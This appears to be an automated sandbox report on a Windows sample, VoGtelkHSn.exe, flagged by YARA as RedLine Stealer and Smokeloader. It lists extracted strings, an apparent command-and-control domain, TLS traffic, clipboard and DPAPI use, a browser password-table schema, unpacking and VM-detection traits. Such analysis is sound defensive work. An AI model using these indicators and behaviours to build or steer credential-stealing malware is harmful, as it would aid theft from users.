Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: VoGtelkHSn.exe, 00000000.00000002.2298398690.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/
Source: VoGtelkHSn.exe, 00000000.00000003.2057403228.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/P
Source: VoGtelkHSn.exe, 00000000.00000003.2047317168.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CBB000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2057403228.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2298422760.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2057403228.0000000002CB9000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2298398690.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/api
Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/apiC
Source: VoGtelkHSn.exe, 00000000.00000003.2047317168.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/apiV
Source: VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CBB000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2298398690.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/apis
Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49711 version: TLS 1.2

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Code function: 0_2_0042C500 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_0042C500

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Code function: 0_2_0042C500 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_0042C500

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_00432010	0_2_00432010
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_004204B7	0_2_004204B7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_00404740	0_2_00404740
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_00420CA0	0_2_00420CA0
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_00406030	0_2_00406030
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_0041D1C1	0_2_0041D1C1
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_00403260	0_2_00403260
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_004052F0	0_2_004052F0
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_004065F0	0_2_004065F0
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_004345F0	0_2_004345F0
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_0040F690	0_2_0040F690
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_004397D0	0_2_004397D0
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_0042594F	0_2_0042594F
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_004259D2	0_2_004259D2
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_00431A70	0_2_00431A70
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_00439AF0	0_2_00439AF0
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_00407CB0	0_2_00407CB0
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_00402E70	0_2_00402E70
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EB6297	0_2_02EB6297
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EB1267	0_2_02EB1267
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EB30D7	0_2_02EB30D7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EB34C7	0_2_02EB34C7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EB5557	0_2_02EB5557
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EE9A37	0_2_02EE9A37
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02ED5BB6	0_2_02ED5BB6
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EBF8F7	0_2_02EBF8F7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EE4857	0_2_02EE4857
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EB6857	0_2_02EB6857
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EBF824	0_2_02EBF824
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EB49A7	0_2_02EB49A7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02ED0F07	0_2_02ED0F07
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EB7F17	0_2_02EB7F17
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EE1CD7	0_2_02EE1CD7
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02ED5C39	0_2_02ED5C39
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EE9D57	0_2_02EE9D57

Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: String function: 02EB8967 appears 48 times
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: String function: 00408D30 appears 168 times
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: String function: 02EB8F97 appears 168 times
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: String function: 00408700 appears 47 times

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5444 -s 1612

Source: VoGtelkHSn.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@1/1

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Code function: 0_2_02BF817E CreateToolhelp32Snapshot,Module32First,

0_2_02BF817E

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Code function: 0_2_00429597 CoCreateInstance,

0_2_00429597

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5444

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\a9d65a1f-c62f-4ac5-ace5-5785ce30c6eb

Jump to behavior

Source: VoGtelkHSn.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: VoGtelkHSn.exe, 00000000.00000003.2058000919.00000000054DF000.00000004.00000800.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2048169939.0000000005447000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: VoGtelkHSn.exe	ReversingLabs: Detection: 42%
Source: VoGtelkHSn.exe	Virustotal: Detection: 41%

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

File read: C:\Users\user\Desktop\VoGtelkHSn.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\VoGtelkHSn.exe "C:\Users\user\Desktop\VoGtelkHSn.exe"
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5444 -s 1612

Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Unpacked PE file: 0.2.VoGtelkHSn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Unpacked PE file: 0.2.VoGtelkHSn.exe.400000.0.unpack

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Code function: 0_2_0043FBE7 push ecx; iretd

0_2_0043FBE8

Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

